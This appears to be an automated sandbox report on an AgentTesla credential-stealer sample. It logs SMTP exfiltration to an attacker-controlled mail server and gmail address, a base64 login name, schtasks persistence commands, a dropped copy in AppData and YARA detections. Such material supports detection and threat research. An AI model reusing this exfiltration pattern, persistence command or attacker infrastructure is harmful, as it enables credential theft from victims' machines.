                                                  .text0x20000xce2f40xce400False0.764352509469697data7.457613017086461IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xd20000x5c80x600False0.427734375data4.1465073095381015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xd40000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0xd20a00x33cdata
                                                  RT_MANIFEST0xd23dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  192.168.2.6111.118.212.38497175872030171 11/29/22-16:51:24.449797TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49717587192.168.2.6111.118.212.38
                                                  192.168.2.6111.118.212.38497225872030171 11/29/22-16:52:18.188399TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49722587192.168.2.6111.118.212.38

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 16:50:57.881586075 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:57.881650925 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:57.881889105 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.005610943 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.005644083 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.314330101 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.314445019 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.332873106 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.332928896 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.333657026 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.413805962 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:59.610924959 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:59.610958099 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:59.757527113 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:59.757646084 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:59.757844925 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:59.763855934 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:51:19.879105091 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:20.153131008 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:20.155756950 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:21.977685928 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:21.978070021 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:22.252252102 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:22.253521919 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:22.526686907 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:22.527221918 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:22.840261936 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.584398985 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.585345030 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:23.860565901 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.860614061 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.860863924 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.168071032 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.169872999 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.442694902 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.443375111 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.449796915 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.449903011 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.449991941 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.450061083 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.722711086 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.724167109 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.771972895 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:46.825879097 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:46.825941086 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:46.826066017 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:46.846575975 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:46.846611977 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.147500992 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.147674084 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:47.156049967 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:47.156074047 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.156639099 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.261645079 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:48.546381950 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:48.546422958 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:48.813997984 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:48.814122915 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:48.814193010 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:48.816801071 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:52:11.437999010 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:11.715953112 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:11.716146946 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:14.190653086 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:14.194787025 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:14.473042011 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:14.499712944 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:14.778090954 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:14.842102051 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:16.164179087 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:16.482769012 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.294580936 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.297631979 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:17.575767994 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.575813055 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.576160908 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:17.894834995 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.900510073 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.901293039 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.179555893 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.179738045 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.188399076 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.188513041 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.188616991 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.188690901 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.466383934 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.467991114 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.514267921 CET49722587192.168.2.6111.118.212.38

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 16:50:57.772516966 CET5908253192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:50:57.789524078 CET53590828.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:50:57.822091103 CET5950453192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:50:57.841023922 CET53595048.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:19.333461046 CET6322953192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:19.724127054 CET53632298.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:19.859044075 CET6253853192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:19.876422882 CET53625388.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:46.733128071 CET5612253192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:46.752038956 CET53561228.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:46.779407978 CET5255653192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:46.796346903 CET53525568.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:52:10.584884882 CET5248153192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:52:10.964626074 CET53524818.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:52:11.035455942 CET5394353192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:52:11.434695959 CET53539438.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 29, 2022 16:50:57.772516966 CET192.168.2.68.8.8.80x2ea1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.822091103 CET192.168.2.68.8.8.80xa8aaStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.333461046 CET192.168.2.68.8.8.80xe3daStandard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.859044075 CET192.168.2.68.8.8.80xf4baStandard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.733128071 CET192.168.2.68.8.8.80x1df9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.779407978 CET192.168.2.68.8.8.80x6660Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:10.584884882 CET192.168.2.68.8.8.80x1930Standard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:11.035455942 CET192.168.2.68.8.8.80xd825Standard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.724127054 CET8.8.8.8192.168.2.60xe3daNo error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.724127054 CET8.8.8.8192.168.2.60xe3daNo error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.876422882 CET8.8.8.8192.168.2.60xf4baNo error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.876422882 CET8.8.8.8192.168.2.60xf4baNo error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:10.964626074 CET8.8.8.8192.168.2.60x1930No error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:52:10.964626074 CET8.8.8.8192.168.2.60x1930No error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:11.434695959 CET8.8.8.8192.168.2.60xd825No error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:52:11.434695959 CET8.8.8.8192.168.2.60xd825No error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • api.ipify.org

                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 29, 2022 16:51:21.977685928 CET58749717111.118.212.38192.168.2.6220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:51:21 +0000
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2022 16:51:21.978070021 CET49717587192.168.2.6111.118.212.38EHLO 302494
                                                  Nov 29, 2022 16:51:22.252252102 CET58749717111.118.212.38192.168.2.6250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2022 16:51:22.253521919 CET49717587192.168.2.6111.118.212.38AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 16:51:22.526686907 CET58749717111.118.212.38192.168.2.6334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 16:51:23.584398985 CET58749717111.118.212.38192.168.2.6235 Authentication succeeded
                                                  Nov 29, 2022 16:51:23.585345030 CET49717587192.168.2.6111.118.212.38MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 16:51:23.860614061 CET58749717111.118.212.38192.168.2.6250 OK
                                                  Nov 29, 2022 16:51:23.860863924 CET49717587192.168.2.6111.118.212.38RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 16:51:24.168071032 CET58749717111.118.212.38192.168.2.6250 Accepted
                                                  Nov 29, 2022 16:51:24.169872999 CET49717587192.168.2.6111.118.212.38DATA
                                                  Nov 29, 2022 16:51:24.443375111 CET58749717111.118.212.38192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 16:51:24.450061083 CET49717587192.168.2.6111.118.212.38.
                                                  Nov 29, 2022 16:51:24.724167109 CET58749717111.118.212.38192.168.2.6250 OK id=1p02tI-0007mJ-Bj
                                                  Nov 29, 2022 16:52:14.190653086 CET58749722111.118.212.38192.168.2.6220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:52:14 +0000
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2022 16:52:14.194787025 CET49722587192.168.2.6111.118.212.38EHLO 302494
                                                  Nov 29, 2022 16:52:14.473042011 CET58749722111.118.212.38192.168.2.6250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2022 16:52:14.499712944 CET49722587192.168.2.6111.118.212.38AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 16:52:14.778090954 CET58749722111.118.212.38192.168.2.6334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 16:52:17.294580936 CET58749722111.118.212.38192.168.2.6235 Authentication succeeded
                                                  Nov 29, 2022 16:52:17.297631979 CET49722587192.168.2.6111.118.212.38MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 16:52:17.575813055 CET58749722111.118.212.38192.168.2.6250 OK
                                                  Nov 29, 2022 16:52:17.576160908 CET49722587192.168.2.6111.118.212.38RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 16:52:17.900510073 CET58749722111.118.212.38192.168.2.6250 Accepted
                                                  Nov 29, 2022 16:52:17.901293039 CET49722587192.168.2.6111.118.212.38DATA
                                                  Nov 29, 2022 16:52:18.179738045 CET58749722111.118.212.38192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 16:52:18.188690901 CET49722587192.168.2.6111.118.212.38.
                                                  Nov 29, 2022 16:52:18.467991114 CET58749722111.118.212.38192.168.2.6250 OK id=1p02uA-00087S-33

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:16:50:18
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Imagebase:0x690000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  General

                                                  Target ID:8
                                                  Start time:16:50:43
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:9
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:10
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x370000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:11
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x870000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:12
                                                  Start time:16:50:45
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Imagebase:0x5c0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 32%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:13
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:14
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:15
                                                  Start time:16:51:32
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x2e0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:16
                                                  Start time:16:51:33
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x460000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  No disassembly